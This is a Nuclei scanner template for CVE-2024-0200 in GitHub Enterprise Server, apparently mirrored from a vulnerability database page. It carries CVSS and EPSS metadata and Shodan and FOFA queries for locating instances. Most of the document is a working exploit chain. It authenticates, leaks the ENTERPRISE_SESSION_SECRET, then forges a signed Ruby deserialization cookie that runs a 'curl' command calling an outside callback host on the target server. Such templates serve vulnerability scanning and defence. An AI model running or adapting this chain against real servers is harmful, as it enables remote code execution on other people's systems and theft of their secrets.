nuclei / ProjectDiscovery / NUCLEI:CVE-2024-0200
History: May 09, 2024 - 11:09 a.m.

Github Enterprise Authenticated Remote Code Execution

2024-05-09 11:09:50
ProjectDiscovery
github.com
cve-2024
reflection injection
user-controlled methods
remote code execution
ghes
organization owner role
github enterprise

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score: 8
Confidence: High
EPSS: 0.059
Percentile: 93.5%

An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.

id: CVE-2024-0200

info:
  name: Github Enterprise Authenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.
  reference:
    - https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/
    - https://blog.convisoappsec.com/en/analysis-of-github-enterprise-vulnerabilities-cve-2024-0507-cve-2024-0200/
    - https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5
    - https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3
    - https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-0200
    cwe-id: CWE-470
    epss-score: 0.06844
    epss-percentile: 0.93885
    cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 7
    vendor: github
    product: "enterprise_server"
    shodan-query:
      - "title:\"GitHub Enterprise\""
      - micro focus dsd
    fofa-query: "app=\"Github-Enterprise\""
  tags: cve,cve2024,rce,github,enterprise
variables:
  username: "{{username}}"
  password: "{{password}}"
  oast: "curl {{interactsh-url}}/?"
  padstr: "{{randstr}}"
  payload: '{{padding(oast,padstr,300)}}'
  marshal_data: '%04%08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy%09:%0e@instanceo:%1dAqueduct::Worker::Worker%07:%0b@childI"%026%0199999999; {{payload}}%06:%06ET:%0c@loggero:%0bLogger%00:%0c@method:%0fkill_child:%09@varI"%10@kill_child%06;%09T:%10@deprecatoro:%1fActiveSupport::Deprecation%06:%0e@silencedT'
  b64_marshal_data: "{{base64(url_decode(marshal_data))}}"
  digest: "{{ (hmac('sha1',b64_marshal_data,ghe_secret)) }}"
  final_payoad: "{{ b64_marshal_data + '--' + digest}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v3/user/orgs"
    headers:
      Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
    extractors:
      - type: json
        part: body
        name: org_name
        internal: true
        json:
          - ".[].login"

  - method: GET
    path:
      - "{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}"
    headers:
      Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"role": "admin"'
        part: body

  - method: POST
    path:
      - "{{BaseURL}}/api/v3/orgs/{{org_name}}/repos"
    headers:
      Content-Type: application/json
      Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
    body: |
          {
            "name": "{{randstr}}"
          }
    matchers:
      - type: status
        status:
          - 201

  - method: GET
    cookie-reuse: true
    path:
      - "{{BaseURL}}/login"
    extractors:
      - type: regex
        part: body
        internal: true
        group: 1
        regex:
          - 'name="authenticity_token" value="(.*?)"'
        name: csrf_token

  - method: POST
    path:
      - "{{BaseURL}}/session"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
      login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}&
    matchers:
      - type: status
        status:
          - 302
      - type: word
        words:
          - "_gh_render"
        part: header

  - method: GET
    path:
      - "{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck"
    extractors:
      - type: regex
        group: 1
        name: ghe_secret
        internal: true
        regex:
          - '"ENTERPRISE_SESSION_SECRET"=>"([^"]+?)"'
        part: body
    matchers:
      - type: word
        words:
          - 'ENTERPRISE_SESSION_SECRET'
        part: body

  - method: GET
    path:
      - "{{BaseURL}}/"
    headers:
      Cookie: _gh_render={{final_payoad}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4a0a00473045022100b55f6b1a271d5853e4388a493b7db6672febea3697dcd0649fbaf6c2538dcefc02201397c08ed2ecd60f4aac71bcf61b1f0b7e66f84146464a70ec4d9f7584e5725b:922c64590222798bb761d5b6d8e72950
